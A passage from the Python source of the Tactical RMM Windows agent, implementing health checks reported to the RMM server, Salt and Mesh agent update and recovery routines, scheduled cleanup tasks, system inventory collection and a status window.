migrate(migrator.add_column(\"agentstorage\", \"cert\", cert))\n self.load_db()\n return\n\n self.headers = {\n \"content-type\": \"application/json\",\n \"Authorization\": f\"Token {self.astor.token}\",\n }\n\n def get_agent_version(self):\n try:\n with open(os.path.join(self.programdir, \"VERSION\")) as f:\n ver = f.read().strip()\n\n return ver\n except:\n return \"0.0.1\"\n\n def setup_logging(self):\n if self.log_to == \"stdout\":\n handler = logging.StreamHandler(sys.stdout)\n else:\n handler = logging.FileHandler(os.path.join(self.programdir, \"winagent.log\"))\n\n logging.basicConfig(\n level=logging.getLevelName(self.log_level),\n format=\"%(asctime)s - %(module)s - %(funcName)s - %(lineno)d - %(levelname)s - %(message)s\",\n handlers=[handler],\n )\n self.logger = logging.getLogger(__name__)\n\n async def script_check(self, data):\n try:\n script_path = data[\"script\"][\"filepath\"]\n shell = data[\"script\"][\"shell\"]\n timeout = data[\"timeout\"]\n script_filename = data[\"script\"][\"filename\"]\n args = []\n\n try:\n args = data[\"script_args\"]\n except KeyError:\n pass\n\n cmd = [\n self.salt_call,\n \"win_agent.run_script\",\n f\"filepath={script_path}\",\n f\"filename={script_filename}\",\n f\"shell={shell}\",\n f\"timeout={timeout}\",\n f\"args={args}\",\n ]\n\n self.logger.debug(cmd)\n start = perf_counter()\n\n proc = await asyncio.create_subprocess_exec(\n *cmd, stdout=asyncio.subprocess.PIPE, stderr=asyncio.subprocess.PIPE\n )\n\n proc_timeout = int(timeout) + 2\n\n try:\n proc_stdout, proc_stderr = await asyncio.wait_for(\n proc.communicate(), proc_timeout\n )\n except asyncio.TimeoutError:\n try:\n proc.terminate()\n except:\n pass\n\n self.logger.debug(f\"Script check timed out after {timeout} seconds\")\n proc_stdout, proc_stderr = False, False\n stdout = \"\"\n stderr = f\"Script timed out after {timeout} seconds\"\n retcode = 98\n\n stop = perf_counter()\n\n if proc_stdout:\n resp = json.loads(proc_stdout.decode(\"utf-8\", errors=\"ignore\"))\n retcode = resp[\"local\"][\"retcode\"]\n stdout = resp[\"local\"][\"stdout\"]\n stderr = resp[\"local\"][\"stderr\"]\n\n elif proc_stderr:\n retcode = 99\n stdout = \"\"\n stderr = proc_stderr.decode(\"utf-8\", errors=\"ignore\")\n\n payload = {\n \"id\": data[\"id\"],\n \"stdout\": stdout,\n \"stderr\": stderr,\n \"retcode\": retcode,\n \"stop\": stop,\n \"start\": start,\n }\n self.logger.debug(payload)\n\n status = requests.patch(\n f\"{self.astor.server}/api/v2/checkrunner/\",\n json.dumps(payload),\n headers=self.headers,\n timeout=15,\n verify=self.verify,\n ).json()\n\n if status == \"failing\" and data[\"assigned_tasks\"]:\n self.logger.debug(data[\"assigned_tasks\"])\n for task in data[\"assigned_tasks\"]:\n if task[\"enabled\"]:\n from taskrunner import TaskRunner\n\n self.logger.debug(task)\n t = TaskRunner(\n task_pk=task[\"id\"],\n log_level=self.log_level,\n log_to=self.log_to,\n )\n await t.run_while_in_event_loop()\n\n return status\n\n except Exception as e:\n self.logger.debug(e)\n return \"failing\"\n\n async def ping_check(self, data):\n try:\n cmd = [\"ping\", data[\"ip\"]]\n r = await asyncio.create_subprocess_exec(\n *cmd,\n stdout=asyncio.subprocess.PIPE,\n stderr=asyncio.subprocess.PIPE,\n )\n\n stdout, stderr = await r.communicate()\n\n has_stdout, has_stderr = False, False\n\n if stdout:\n has_stdout = True\n output = stdout.decode(\"utf-8\", errors=\"ignore\")\n elif stderr:\n has_stderr = True\n output = stderr.decode(\"utf-8\", errors=\"ignore\")\n\n payload = {\n \"id\": data[\"id\"],\n \"has_stdout\": has_stdout,\n \"has_stderr\": has_stderr,\n \"output\": output,\n }\n\n self.logger.debug(payload)\n\n status = requests.patch(\n f\"{self.astor.server}/api/v2/checkrunner/\",\n json.dumps(payload),\n headers=self.headers,\n timeout=15,\n verify=self.verify,\n ).json()\n self.logger.debug(status)\n\n if status == \"failing\" and data[\"assigned_tasks\"]:\n self.logger.debug(data[\"assigned_tasks\"])\n for task in data[\"assigned_tasks\"]:\n if task[\"enabled\"]:\n from taskrunner import TaskRunner\n\n self.logger.debug(task)\n t = TaskRunner(\n task_pk=task[\"id\"],\n log_level=self.log_level,\n log_to=self.log_to,\n )\n await t.run_while_in_event_loop()\n\n return status\n\n except Exception as e:\n self.logger.debug(e)\n return \"failing\"\n\n async def disk_check(self, data, exists=True):\n try:\n disk = psutil.disk_usage(data[\"disk\"])\n except Exception:\n exists = False\n self.logger.error(f\"Disk {data['disk']} does not exist\")\n\n if exists:\n payload = {\n \"id\": data[\"id\"],\n \"percent_used\": disk.percent,\n \"total\": disk.total,\n \"free\": disk.free,\n \"exists\": exists,\n }\n else:\n payload = {\"id\": data[\"id\"], \"exists\": False}\n\n self.logger.debug(payload)\n\n status = requests.patch(\n f\"{self.astor.server}/api/v2/checkrunner/\",\n json.dumps(payload),\n headers=self.headers,\n timeout=15,\n verify=self.verify,\n ).json()\n self.logger.debug(status)\n\n if status == \"failing\" and data[\"assigned_tasks\"]:\n self.logger.debug(data[\"assigned_tasks\"])\n for task in data[\"assigned_tasks\"]:\n if task[\"enabled\"]:\n from taskrunner import TaskRunner\n\n self.logger.debug(task)\n t = TaskRunner(\n task_pk=task[\"id\"],\n log_level=self.log_level,\n log_to=self.log_to,\n )\n await t.run_while_in_event_loop()\n\n return status\n\n async def cpu_load_check(self, data, interval=7):\n try:\n interval = int(data[\"interval\"])\n except:\n pass\n\n try:\n psutil.cpu_percent(interval=0)\n await asyncio.sleep(interval)\n cpu_load = round(psutil.cpu_percent(interval=0))\n\n payload = {\"percent\": cpu_load, \"id\": data[\"id\"]}\n self.logger.debug(payload)\n\n status = requests.patch(\n f\"{self.astor.server}/api/v2/checkrunner/\",\n json.dumps(payload),\n headers=self.headers,\n timeout=15,\n verify=self.verify,\n ).json()\n self.logger.debug(status)\n\n if status == \"failing\" and data[\"assigned_tasks\"]:\n self.logger.debug(data[\"assigned_tasks\"])\n for task in data[\"assigned_tasks\"]:\n if task[\"enabled\"]:\n from taskrunner import TaskRunner\n\n self.logger.debug(task)\n t = TaskRunner(\n task_pk=task[\"id\"],\n log_level=self.log_level,\n log_to=self.log_to,\n )\n await t.run_while_in_event_loop()\n\n return status\n\n except Exception as e:\n self.logger.debug(e)\n return False\n\n async def mem_check(self, data):\n try:\n payload = {\"percent\": self.get_used_ram(), \"id\": data[\"id\"]}\n self.logger.debug(payload)\n\n status = requests.patch(\n f\"{self.astor.server}/api/v2/checkrunner/\",\n json.dumps(payload),\n headers=self.headers,\n timeout=15,\n verify=self.verify,\n ).json()\n self.logger.debug(status)\n\n if status == \"failing\" and data[\"assigned_tasks\"]:\n self.logger.debug(data[\"assigned_tasks\"])\n for task in data[\"assigned_tasks\"]:\n if task[\"enabled\"]:\n from taskrunner import TaskRunner\n\n self.logger.debug(task)\n t = TaskRunner(\n task_pk=task[\"id\"],\n log_level=self.log_level,\n log_to=self.log_to,\n )\n await t.run_while_in_event_loop()\n\n return status\n\n except Exception as e:\n self.logger.debug(e)\n return False\n\n async def win_service_check(self, data, exists=True):\n try:\n try:\n service = psutil.win_service_get(data[\"svc_name\"])\n except psutil.NoSuchProcess:\n exists = False\n self.logger.error(f\"Service {data['svc_name']} does not exist\")\n\n payload = {\n \"id\": data[\"id\"],\n \"status\": service.status() if exists else \"n/a\",\n \"exists\": exists,\n }\n self.logger.debug(payload)\n\n status = requests.patch(\n f\"{self.astor.server}/api/v2/checkrunner/\",\n json.dumps(payload),\n headers=self.headers,\n timeout=70,\n verify=self.verify,\n ).json()\n self.logger.debug(status)\n\n if status == \"failing\" and data[\"assigned_tasks\"]:\n self.logger.debug(data[\"assigned_tasks\"])\n for task in data[\"assigned_tasks\"]:\n if task[\"enabled\"]:\n from taskrunner import TaskRunner\n\n self.logger.debug(task)\n t = TaskRunner(\n task_pk=task[\"id\"],\n log_level=self.log_level,\n log_to=self.log_to,\n )\n await t.run_while_in_event_loop()\n\n return status\n except Exception as e:\n self.logger.debug(e)\n return \"failing\"\n\n async def event_log_check(self, data):\n try:\n log = []\n\n api_log_name = data[\"log_name\"]\n api_search_last_days = int(data[\"search_last_days\"])\n\n if api_search_last_days != 0:\n start_time = dt.datetime.now() - dt.timedelta(days=api_search_last_days)\n\n flags = (\n win32evtlog.EVENTLOG_BACKWARDS_READ\n | win32evtlog.EVENTLOG_SEQUENTIAL_READ\n )\n\n status_dict = {\n win32con.EVENTLOG_AUDIT_FAILURE: \"AUDIT_FAILURE\",\n win32con.EVENTLOG_AUDIT_SUCCESS: \"AUDIT_SUCCESS\",\n win32con.EVENTLOG_INFORMATION_TYPE: \"INFO\",\n win32con.EVENTLOG_WARNING_TYPE: \"WARNING\",\n win32con.EVENTLOG_ERROR_TYPE: \"ERROR\",\n 0: \"INFO\",\n }\n\n hand = win32evtlog.OpenEventLog(\"localhost\", api_log_name)\n total = win32evtlog.GetNumberOfEventLogRecords(hand)\n uid = 0\n done = False\n\n while 1:\n\n events = win32evtlog.ReadEventLog(hand, flags, 0)\n for ev_obj in events:\n\n uid += 1\n # return once total number of events reach or we'll be stuck in an infinite loop\n if uid >= total:\n done = True\n break\n\n the_time = ev_obj.TimeGenerated.Format()\n time_obj = dt.datetime.strptime(the_time, \"%c\")\n\n if api_search_last_days != 0:\n if time_obj < start_time:\n done = True\n break\n\n computer = str(ev_obj.ComputerName)\n src = str(ev_obj.SourceName)\n evt_type = str(status_dict[ev_obj.EventType])\n evt_id = str(winerror.HRESULT_CODE(ev_obj.EventID))\n evt_category = str(ev_obj.EventCategory)\n record = str(ev_obj.RecordNumber)\n msg = (\n str(win32evtlogutil.SafeFormatMessage(ev_obj, api_log_name))\n .replace(\"<\", \"\")\n .replace(\">\", \"\")\n )\n\n event_dict = {\n \"computer\": computer,\n \"source\": src,\n \"eventType\": evt_type,\n \"eventID\": evt_id,\n \"eventCategory\": evt_category,\n \"message\": msg,\n \"time\": the_time,\n \"record\": record,\n \"uid\": uid,\n }\n log.append(event_dict)\n\n if done:\n break\n\n win32evtlog.CloseEventLog(hand)\n payload = {\"id\": data[\"id\"], \"log\": self._compress_json(log)}\n\n status = requests.patch(\n f\"{self.astor.server}/api/v2/checkrunner/\",\n json.dumps(payload),\n headers=self.headers,\n timeout=45,\n verify=self.verify,\n ).json()\n self.logger.debug(status)\n\n if status == \"failing\" and data[\"assigned_tasks\"]:\n self.logger.debug(data[\"assigned_tasks\"])\n for task in data[\"assigned_tasks\"]:\n if task[\"enabled\"]:\n from taskrunner import TaskRunner\n\n self.logger.debug(task)\n t = TaskRunner(\n task_pk=task[\"id\"],\n log_level=self.log_level,\n log_to=self.log_to,\n )\n await t.run_while_in_event_loop()\n\n return status\n except Exception as e:\n self.logger.debug(e)\n return \"failing\"\n\n def get_db(self):\n with db:\n astor = AgentStorage.select()[0]\n\n return astor\n\n def get_boot_time(self):\n return psutil.boot_time()\n\n def get_used_ram(self):\n return round(psutil.virtual_memory().percent)\n\n def get_services(self):\n # see https://github.com/wh1te909/tacticalrmm/issues/38\n # for why I am manually implementing the svc.as_dict() method of psutil\n ret = []\n for svc in psutil.win_service_iter():\n i = {}\n try:\n i[\"display_name\"] = svc.display_name()\n i[\"binpath\"] = svc.binpath()\n i[\"username\"] = svc.username()\n i[\"start_type\"] = svc.start_type()\n i[\"status\"] = svc.status()\n i[\"pid\"] = svc.pid()\n i[\"name\"] = svc.name()\n i[\"description\"] = svc.description()\n except Exception:\n continue\n else:\n ret.append(i)\n\n return ret\n\n def get_total_ram(self):\n return math.ceil((psutil.virtual_memory().total / 1_073_741_824))\n\n def get_logged_on_user(self):\n try:\n return psutil.users()[0].name\n except Exception:\n return \"None\"\n\n def get_public_ip(self):\n try:\n ifconfig = requests.get(\"https://ifconfig.co/ip\", timeout=5).text.strip()\n\n if not validators.ipv4(ifconfig) and not validators.ipv6(ifconfig):\n icanhaz = requests.get(\"https://icanhazip.com\", timeout=7).text.strip()\n\n if not validators.ipv4(icanhaz) and not validators.ipv6(icanhaz):\n return \"error\"\n else:\n return icanhaz\n else:\n return ifconfig\n\n except Exception as e:\n self.logger.debug(e)\n return \"error\"\n\n def get_cmd_output(self, cmd, timeout=30):\n try:\n r = subprocess.run(cmd, capture_output=True, timeout=timeout)\n except Exception as e:\n self.logger.debug(e)\n return \"error getting output\"\n\n if r.stdout:\n return r.stdout.decode(\"utf-8\", errors=\"ignore\")\n elif r.stderr:\n return r.stderr.decode(\"utf-8\", errors=\"ignore\")\n else:\n return \"error getting output\"\n\n def get_os(self):\n try:\n os = wmi.WMI().Win32_OperatingSystem()[0]\n return (\n f\"{os.Caption}, {platform.architecture()[0]} (build {os.BuildNumber})\"\n )\n except Exception as e:\n self.logger.debug(e)\n return \"unknown-os\"\n\n def get_disks(self):\n disks = defaultdict(dict)\n try:\n for part in psutil.disk_partitions(all=False):\n if os.name == \"nt\":\n if \"cdrom\" in part.opts or part.fstype == \"\":\n continue\n usage = psutil.disk_usage(part.mountpoint)\n device = part.device.split(\"\\\\\", 1)[0]\n disks[device][\"device\"] = device\n disks[device][\"total\"] = bytes2human(usage.total)\n disks[device][\"used\"] = bytes2human(usage.used)\n disks[device][\"free\"] = bytes2human(usage.free)\n disks[device][\"percent\"] = int(usage.percent)\n disks[device][\"fstype\"] = part.fstype\n except Exception as e:\n self.logger.debug(e)\n disks = {\"error\": \"error getting disk info\"}\n\n return disks\n\n def get_platform_release(self):\n try:\n os = get_os_version_info()\n grains = get_windows_os_release_grain(os[\"Caption\"], os[\"ProductType\"])\n plat = platform.system().lower()\n plat_release = f\"{plat}-{grains}\"\n except Exception as e:\n self.logger.debug(e)\n plat_release = \"unknown-release\"\n\n return plat_release\n\n def get_av(self):\n try:\n r = subprocess.run(\n [\n \"wmic\",\n \"/Namespace:\\\\\\\\root\\SecurityCenter2\",\n \"Path\",\n \"AntiVirusProduct\",\n \"get\",\n \"displayName\" \"/FORMAT:List\",\n ],\n capture_output=True,\n timeout=30,\n )\n\n if r.stdout:\n out = (\n r.stdout.decode(\"utf-8\", errors=\"ignore\")\n .lower()\n .replace(\" \", \"\")\n .splitlines()\n )\n out[:] = [i for i in out if i != \"\"] # remove empty list items\n\n if len(out) == 1 and out[0] == \"displayname=windowsdefender\":\n return \"windowsdefender\"\n\n elif len(out) == 2:\n if \"displayname=windowsdefender\" in out:\n out.remove(\"displayname=windowsdefender\")\n return out[0].split(\"displayname=\", 1)[1]\n\n return \"n/a\"\n\n elif r.stderr:\n return \"n/a\"\n else:\n return \"n/a\"\n except Exception as e:\n self.logger.debug(e)\n return \"n/a\"\n\n def salt_call_ret_bool(self, cmd, args=[], timeout=30):\n assert isinstance(args, list)\n try:\n command = [self.salt_call, cmd, \"--local\", f\"--timeout={timeout}\"]\n\n if args:\n # extend list at 3rd position\n command[2:2] = args\n\n r = subprocess.run(command, capture_output=True, timeout=timeout)\n except Exception as e:\n self.logger.debug(e)\n return False\n else:\n try:\n ret = json.loads(r.stdout.decode(\"utf-8\", errors=\"ignore\"))\n if ret[\"local\"]:\n return True\n else:\n return False\n except Exception as e:\n self.logger.debug(e)\n return False\n\n def get_salt_version(self):\n cmd = [self.salt_call, \"pkg.list_pkgs\", \"--local\", \"--timeout=45\"]\n try:\n r = subprocess.run(cmd, capture_output=True, timeout=50)\n ret = json.loads(r.stdout.decode(\"utf-8\", errors=\"ignore\"))\n ver = [\n (k, v) for k, v in ret[\"local\"].items() if \"salt minion\" in k.lower()\n ][0][1]\n except Exception as e:\n self.logger.debug(e)\n return False\n else:\n return ver\n\n def wait_for_service(self, svc, status, retries=10):\n attempts = 0\n\n while 1:\n try:\n service = psutil.win_service_get(svc)\n except psutil.NoSuchProcess:\n attempts += 1\n sleep(5)\n else:\n stat = service.status()\n if stat != status:\n attempts += 1\n sleep(5)\n else:\n attempts = 0\n\n if attempts == 0 or attempts >= retries:\n break\n\n def force_kill_salt(self):\n pids = []\n for proc in psutil.process_iter():\n with proc.oneshot():\n if proc.name().lower() == \"python.exe\" and \"salt\" in proc.exe():\n pids.append(proc.pid)\n\n for pid in pids:\n try:\n self.logger.debug(f\"killing proc with pid {pid}\")\n kill_proc(pid)\n except:\n continue\n\n def update_salt(self):\n try:\n get = f\"{self.astor.server}/api/v2/{self.astor.agentid}/saltminion/\"\n r = requests.get(get, headers=self.headers, timeout=15, verify=self.verify)\n if r.status_code != 200:\n self.logger.error(r.status_code)\n return\n\n try:\n current_ver = r.json()[\"currentVer\"]\n latest_ver = r.json()[\"latestVer\"]\n salt_id = r.json()[\"salt_id\"]\n except Exception as e:\n self.logger.error(e)\n return\n\n installed_ver = self.get_salt_version()\n if not isinstance(installed_ver, str):\n self.logger.error(\"Unable to get installed salt version. Aborting\")\n return\n\n if latest_ver == installed_ver:\n self.logger.debug(\n f\"Latest version {latest_ver} is same as installed version {installed_ver}. Skipping.\"\n )\n return\n\n self.logger.info(\"Updating salt\")\n\n try:\n get_minion = requests.get(\n self.salt_minion_exe, stream=True, timeout=900\n )\n except Exception as e:\n self.logger.error(e)\n return\n\n if get_minion.status_code != 200:\n self.logger.error(\n f\"{get_minion.status_code}: Unable to download salt-minion. Aborting\"\n )\n return False\n\n minion_file = os.path.join(self.programdir, self.salt_installer)\n if os.path.exists(minion_file):\n os.remove(minion_file)\n\n sleep(1)\n with open(minion_file, \"wb\") as f:\n for chunk in get_minion.iter_content(chunk_size=1024):\n if chunk:\n f.write(chunk)\n\n del get_minion\n\n subprocess.run(\n [self.nssm, \"stop\", \"checkrunner\"], capture_output=True, timeout=60\n )\n\n self.logger.debug(\"stopping salt-minion\")\n subprocess.run(\n [self.nssm, \"stop\", \"salt-minion\"], capture_output=True, timeout=60\n )\n self.wait_for_service(svc=\"salt-minion\", status=\"stopped\", retries=15)\n self.logger.debug(\"salt svc was stopped\")\n\n self.force_kill_salt()\n\n salt_cmd = [\n self.salt_installer,\n \"/S\",\n \"/custom-config=saltcustom\",\n f\"/master={self.astor.salt_master}\",\n f\"/minion-name={salt_id}\",\n \"/start-minion=1\",\n ]\n\n self.logger.debug(\"running salt update command\")\n try:\n r = subprocess.run(\n salt_cmd,\n cwd=self.programdir,\n capture_output=True,\n shell=True,\n timeout=300,\n )\n except Exception as e:\n self.logger.error(e)\n subprocess.run(\n [self.nssm, \"start\", \"checkrunner\"], capture_output=True, timeout=60\n )\n return\n\n self.logger.debug(\"waiting for salt to start\")\n self.wait_for_service(svc=\"salt-minion\", status=\"running\")\n self.logger.debug(\"salt started\")\n\n subprocess.run(\n [self.nssm, \"start\", \"checkrunner\"], capture_output=True, timeout=60\n )\n\n put = f\"{self.astor.server}/api/v2/saltminion/\"\n payload = {\"ver\": latest_ver, \"agent_id\": self.astor.agentid}\n r = requests.put(\n put,\n json.dumps(payload),\n headers=self.headers,\n timeout=30,\n verify=self.verify,\n )\n if r.status_code != 200:\n self.logger.error(r.status_code)\n\n self.logger.info(f\"Salt was updated from {installed_ver} to {latest_ver}\")\n except Exception as e:\n self.logger.error(e)\n\n def recover_salt(self):\n try:\n r = subprocess.run(\n [self.nssm, \"stop\", \"salt-minion\"], capture_output=True, timeout=30\n )\n\n self.wait_for_service(svc=\"salt-minion\", status=\"stopped\", retries=15)\n self.fix_salt(by_time=False)\n self.force_kill_salt()\n\n r = subprocess.run(\n [\"ipconfig\", \"/flushdns\"], capture_output=True, timeout=30\n )\n r = subprocess.run(\n [self.nssm, \"start\", \"salt-minion\"], capture_output=True, timeout=30\n )\n except Exception as e:\n self.logger.error(e)\n\n def recover_mesh(self):\n self._mesh_service_action(\"stop\")\n self.wait_for_service(svc=\"mesh agent\", status=\"stopped\", retries=3)\n pids = [\n proc.info\n for proc in psutil.process_iter(attrs=[\"pid\", \"name\"])\n if \"meshagent\" in proc.info[\"name\"].lower()\n ]\n\n for pid in pids:\n kill_proc(pid[\"pid\"])\n\n mesh1 = os.path.join(os.environ[\"ProgramFiles\"], \"Mesh Agent\", \"MeshAgent.exe\")\n mesh2 = os.path.join(self.programdir, self.mesh_installer)\n if os.path.exists(mesh1):\n exe = mesh1\n else:\n exe = mesh2\n\n r = subprocess.run([exe, \"-nodeidhex\"], capture_output=True, timeout=30)\n if r.returncode != 0:\n self._mesh_service_action(\"start\")\n return\n\n node_hex = r.stdout.decode(\"utf-8\", errors=\"ignore\").strip()\n if \"not defined\" in node_hex.lower():\n self._mesh_service_action(\"start\")\n return\n\n try:\n mesh_info = f\"{self.astor.server}/api/v1/{self.astor.agentpk}/meshinfo/\"\n resp = requests.get(\n mesh_info, headers=self.headers, timeout=15, verify=self.verify\n )\n except Exception:\n self._mesh_service_action(\"start\")\n return\n\n if resp.status_code == 200 and isinstance(resp.json(), str):\n if node_hex != resp.json():\n payload = {\"nodeidhex\": node_hex}\n requests.patch(\n mesh_info,\n json.dumps(payload),\n headers=self.headers,\n timeout=15,\n verify=self.verify,\n )\n\n self._mesh_service_action(\"start\")\n\n def spawn_detached_process(self, cmd, shell=False):\n CREATE_NEW_PROCESS_GROUP = 0x00000200\n DETACHED_PROCESS = 0x00000008\n p = subprocess.Popen(\n cmd,\n stdin=subprocess.PIPE,\n stdout=subprocess.PIPE,\n stderr=subprocess.PIPE,\n close_fds=True,\n shell=shell,\n creationflags=DETACHED_PROCESS | CREATE_NEW_PROCESS_GROUP,\n )\n return p.pid\n\n def cleanup(self):\n self.cleanup_tasks()\n\n def fix_salt(self, by_time=True):\n \"\"\"\n Script checks use salt-call, which for whatever reason becomes unstable after around 24 hours of uptime\n This leads to tons of hung python processes not being killed even with timeout set in salt's cmd.script module\n This function runs every hour as a scheduled task to clean up hung processes\n \"\"\"\n\n # strings that will be in the scriptchecks command line args\n # we check to see if any of these are in our long running processes\n # we don't want to kill salt's main process, just the ones that have\n # any of the following args\n script_checks = (\n \"win_agent.run_python_script\",\n \"salt-call\",\n \"userdefined\",\n \"salt://scripts\",\n \"cmd.script\",\n )\n\n pids = []\n\n for proc in psutil.process_iter():\n with proc.oneshot():\n if proc.name() == \"python.exe\" or proc.name == \"pythonw.exe\":\n if \"salt\" in proc.exe():\n if any(_ in proc.cmdline() for _ in script_checks):\n if by_time:\n # psutil returns the process creation time as seconds since epoch\n # convert it and the current local time now to utc so we can compare them\n proc_ct = dt.datetime.fromtimestamp(\n proc.create_time()\n ).replace(tzinfo=dt.timezone.utc)\n\n utc_now = dt.datetime.now(dt.timezone.utc)\n\n # seconds since the process was created\n seconds = int(abs(utc_now - proc_ct).total_seconds())\n\n # if process has been running for > 24 hours, need to kill it\n if seconds > 86_400:\n pids.append(proc.pid)\n\n else:\n # if we are uninstalling, don't care about time.\n # kill everything that's hung\n pids.append(proc.pid)\n\n if pids:\n this_proc = os.getpid()\n for pid in pids:\n if pid == this_proc:\n # don't kill myself\n continue\n\n self.logger.warning(f\"Killing salt pid: {pid}\")\n kill_proc(pid)\n\n def _compress_json(self, j):\n return base64.b64encode(\n zlib.compress(json.dumps(j).encode(\"utf-8\", errors=\"ignore\"))\n ).decode(\"ascii\", errors=\"ignore\")\n\n def _mesh_service_action(self, action):\n r = subprocess.run(\n [\"sc\", action, \"mesh agent\"], capture_output=True, timeout=30\n )\n\n def fix_mesh(self):\n \"\"\"\n Mesh agent will randomly bug out and kill cpu usage\n This functions runs every hour as a scheduled task to solve that\n \"\"\"\n mesh = [\n proc.info\n for proc in psutil.process_iter(attrs=[\"pid\", \"name\"])\n if \"meshagent\" in proc.info[\"name\"].lower()\n ]\n\n if mesh:\n try:\n proc = psutil.Process(mesh[0][\"pid\"])\n except psutil.NoSuchProcess:\n try:\n self._mesh_service_action(\"stop\")\n sleep(3)\n self._mesh_service_action(\"start\")\n finally:\n return\n\n cpu_usage = proc.cpu_percent(10) / psutil.cpu_count()\n\n if cpu_usage >= 15.0:\n self.logger.warning(\n f\"Mesh agent cpu usage: {cpu_usage}%. Restarting...\"\n )\n\n self._mesh_service_action(\"stop\")\n self.wait_for_service(svc=\"mesh agent\", status=\"stopped\", retries=10)\n\n # sometimes stopping service doesn't kill the hung proc\n mesh2 = [\n proc.info\n for proc in psutil.process_iter(attrs=[\"pid\", \"name\"])\n if \"meshagent\" in proc.info[\"name\"].lower()\n ]\n\n if mesh2:\n pids = []\n for proc in mesh2:\n pids.append(proc[\"pid\"])\n\n for pid in pids:\n kill_proc(pid)\n\n sleep(1)\n\n self._mesh_service_action(\"start\")\n\n def create_fix_salt_task(self):\n\n start_obj = dt.datetime.now() + dt.timedelta(minutes=5)\n start_time = dt.datetime.strftime(start_obj, \"%H:%M\")\n\n cmd = [\n \"name=TacticalRMM_fixsalt\",\n \"force=True\",\n \"action_type=Execute\",\n f'cmd=\"{self.exe}\"',\n \"arguments='-m fixsalt'\",\n \"trigger_type=Daily\",\n f\"start_time='{start_time}'\",\n \"repeat_interval='1 hour'\",\n \"ac_only=False\",\n \"stop_if_on_batteries=False\",\n ]\n\n return self.salt_call_ret_bool(\"task.create_task\", args=cmd)\n\n def create_fix_mesh_task(self):\n\n start_obj = dt.datetime.now() + dt.timedelta(minutes=7)\n start_time = dt.datetime.strftime(start_obj, \"%H:%M\")\n\n cmd = [\n \"name=TacticalRMM_fixmesh\",\n \"force=True\",\n \"action_type=Execute\",\n f'cmd=\"{self.exe}\"',\n \"arguments='-m fixmesh'\",\n \"trigger_type=Daily\",\n f\"start_time='{start_time}'\",\n \"repeat_interval='1 hour'\",\n \"ac_only=False\",\n \"stop_if_on_batteries=False\",\n ]\n\n return self.salt_call_ret_bool(\"task.create_task\", args=cmd)\n\n def cleanup_tasks(self):\n r = subprocess.run(\n [self.salt_call, \"task.list_tasks\", \"--local\"], capture_output=True\n )\n\n ret = json.loads(r.stdout.decode(\"utf-8\", \"ignore\"))[\"local\"]\n\n tasks = [task for task in ret if task.startswith(\"TacticalRMM_\")]\n\n for task in tasks:\n try:\n self.salt_call_ret_bool(\"task.delete_task\", args=[task])\n except:\n pass\n\n def send_system_info(self):\n class SystemDetail:\n def __init__(self):\n c = wmi.WMI()\n self.comp_sys_prod = c.Win32_ComputerSystemProduct()\n self.comp_sys = c.Win32_ComputerSystem()\n self.memory = c.Win32_PhysicalMemory()\n self.os = c.Win32_OperatingSystem()\n self.base_board = c.Win32_BaseBoard()\n self.bios = c.Win32_BIOS()\n self.disk = c.Win32_DiskDrive()\n self.network_adapter = c.Win32_NetworkAdapter()\n self.network_config = c.Win32_NetworkAdapterConfiguration()\n self.desktop_monitor = c.Win32_DesktopMonitor()\n self.cpu = c.Win32_Processor()\n self.usb = c.Win32_USBController()\n\n def get_all(self, obj):\n ret = []\n for i in obj:\n tmp = [\n {j: getattr(i, j)}\n for j in list(i.properties)\n if getattr(i, j) is not None\n ]\n ret.append(tmp)\n\n return ret\n\n info = SystemDetail()\n try:\n sysinfo = {\n \"comp_sys_prod\": info.get_all(info.comp_sys_prod),\n \"comp_sys\": info.get_all(info.comp_sys),\n \"mem\": info.get_all(info.memory),\n \"os\": info.get_all(info.os),\n \"base_board\": info.get_all(info.base_board),\n \"bios\": info.get_all(info.bios),\n \"disk\": info.get_all(info.disk),\n \"network_adapter\": info.get_all(info.network_adapter),\n \"network_config\": info.get_all(info.network_config),\n \"desktop_monitor\": info.get_all(info.desktop_monitor),\n \"cpu\": info.get_all(info.cpu),\n \"usb\": info.get_all(info.usb),\n }\n\n except Exception as e:\n self.logger.debug(e)\n return\n\n payload = {\"agent_id\": self.astor.agentid, \"sysinfo\": sysinfo}\n url = f\"{self.astor.server}/api/v2/sysinfo/\"\n try:\n r = requests.patch(\n url,\n json.dumps(payload),\n headers=self.headers,\n timeout=15,\n verify=self.verify,\n )\n except:\n pass\n\n def generate_agent_id(self):\n rand = \"\".join(random.choice(string.ascii_letters) for _ in range(35))\n return f\"{rand}-{self.hostname}\"\n\n def uninstall_salt(self):\n print(\"Stopping salt-minion service\", flush=True)\n r = subprocess.run(\n [self.nssm, \"stop\", \"salt-minion\"], timeout=45, capture_output=True\n )\n\n self.wait_for_service(svc=\"salt-minion\", status=\"stopped\", retries=15)\n\n # clean up any hung salt python procs\n self.force_kill_salt()\n\n print(\"Uninstalling existing salt-minion\", flush=True)\n salt_uninst = os.path.join(self.system_drive, \"\\\\salt\\\\uninst.exe\")\n r = subprocess.run(\n [salt_uninst, \"/S\"], shell=True, timeout=120, capture_output=True\n )\n sleep(30)\n\n remove_dir(os.path.join(self.system_drive, \"\\\\salt\"))\n print(\"Salt was removed\", flush=True)\n\n\ndef show_agent_status(window, gui):\n import win32api\n import win32con\n import win32gui\n import win32ts\n import win32ui\n\n class AgentStatus:\n def __init__(self, agent_status, salt_status, check_status, mesh_status):\n self.agent_status = agent_status\n self.salt_status = salt_status\n self.check_status = check_status\n self.mesh_status = mesh_status\n self.icon = os.path.join(os.getcwd(), \"onit.ico\")\n win32gui.InitCommonControls()\n self.hinst = win32api.GetModuleHandle(None)\n className = \"AgentStatus\"\n message_map = {\n win32con.WM_DESTROY: self.OnDestroy,\n }\n wc = win32gui.WNDCLASS()\n wc.style = win32con.CS_HREDRAW | win32con.CS_VREDRAW\n try:\n wc.hIcon = win32gui.LoadImage(\n self.hinst,\n self.icon,\n win32con.IMAGE_ICON,\n 0,\n 0,\n win32con.LR_LOADFROMFILE,\n )\n except Exception:\n pass\n wc.lpfnWndProc = message_map\n wc.lpszClassName = className\n win32gui.RegisterClass(wc)\n style = win32con.WS_OVERLAPPEDWINDOW\n self.hwnd = win32gui.CreateWindow(\n className,\n \"Tactical RMM\",\n style,\n win32con.CW_USEDEFAULT,\n win32con.CW_USEDEFAULT,\n 400,\n 300,\n 0,\n 0,\n self.hinst,\n None,\n )\n\n win32gui.ShowWindow(self.hwnd, win32con.SW_SHOW)\n\n hDC, paintStruct = win32gui.BeginPaint(self.hwnd)\n rect = win32gui.GetClientRect(self.hwnd)\n win32gui.DrawText(\n 